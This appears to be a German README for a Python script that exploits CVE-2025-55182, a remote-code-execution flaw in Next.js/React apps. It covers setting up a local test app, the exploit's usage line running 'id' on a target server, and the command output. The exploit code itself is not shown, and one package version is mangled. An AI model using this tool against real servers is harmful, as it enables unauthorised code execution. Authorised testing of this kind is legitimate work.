
Python3-Skript, das zur Demonstration von **CVE-2025-55182** verwendet werden kann. Es nutzt eine serverseitige JavaScript-Injection-Sicherheitslücke in Next.js/React-Anwendungen aus, die **Remote-Code-Ausführung** über fehlerhafte Multipart-Formulardaten ermöglicht.
Python 3-Skript, das verwendet werden kann, um CVE-2025-55182 zu demonstrieren. Es nutzt eine serverseitige JavaScript-Injection-Schwachstelle in Next.js/React-Anwendungen aus, die Remote Code Execution über fehlerhafte Multipart-Formulardaten ermöglicht.
⚠️ Nur für Bildungszwecke und autorisierte Tests.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u Ziel-Domain oder IP mit Protokoll - http://localhost:3000 -c Befehl, der auf dem Server ausgeführt werden soll - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)